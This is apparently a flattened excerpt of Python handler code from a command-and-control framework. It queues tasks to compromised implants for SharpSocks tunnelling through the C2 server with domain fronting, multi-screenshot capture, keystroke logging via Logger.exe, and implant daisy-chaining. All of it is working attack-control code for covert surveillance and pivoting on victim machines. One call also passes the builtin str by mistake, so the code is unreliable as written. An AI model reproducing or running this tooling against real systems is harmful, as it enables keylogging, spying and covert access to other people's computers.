def do_sharpsocks(user, command, randomuri): check_module_loaded("SharpSocks.ps1", randomuri, user) import string from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurl = select_item("PayloadCommsHost", "C2Server") sharpport = select_item("PayloadCommsPort", "C2Server") dfheader = select_item("DomainFrontHeader", "C2Server") implant = get_implantdetails(randomuri) pivot = implant[15] if pivot != "PS": sharpurl = input("Enter the URL for SharpSocks: ") if (sharpport != 80 and sharpport != 443): if (sharpurl.count("/") >= 3): pat = re.compile(r"(?<!/)/(?!/)") sharpurl = pat.sub(":%s/" % sharpport, str, 1) else: sharpurl = ("%s:%s" % (sharpurl, sharpport)) print(PoshInstallDirectory + "resources/SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri.lower() == "n": print("") if (ri == "") or (ri.lower() == "y"): taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls) if dfheader: taskcmd += " -DomainFrontURL %s" % dfheader new_task(taskcmd, user, randomuri) update_label("SharpSocks", randomuri)
def do_get_screenshotmulti(user, command, randomuri): new_task(command, user, randomuri) update_label("SCREENSHOT", randomuri)
def do_start_keystrokes(user, command, randomuri): check_module_loaded("Logger.exe", randomuri, user) new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) update_label("KEYLOG", randomuri)
def do_stop_keystrokes(user, command, randomuri): new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) update_label("", randomuri)
def do_remove_label(user, command, randomuri): update_label("", randomuri)
def do_label_implant(user, command, randomuri): label = command.replace('label-implant', '').strip() update_label(label, randomuri)
def do_stopsocks(user, command, randomuri): update_label("", randomuri) new_task(command, user, randomuri)
def do_invoke_daisychain(user, command, randomuri): check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user) urls = get_allurls() new_task("%s -URLs '%s'" % (command, urls), user, randomuri) update_label("DaisyHost", randomuri) print("Now use createdaisypayload")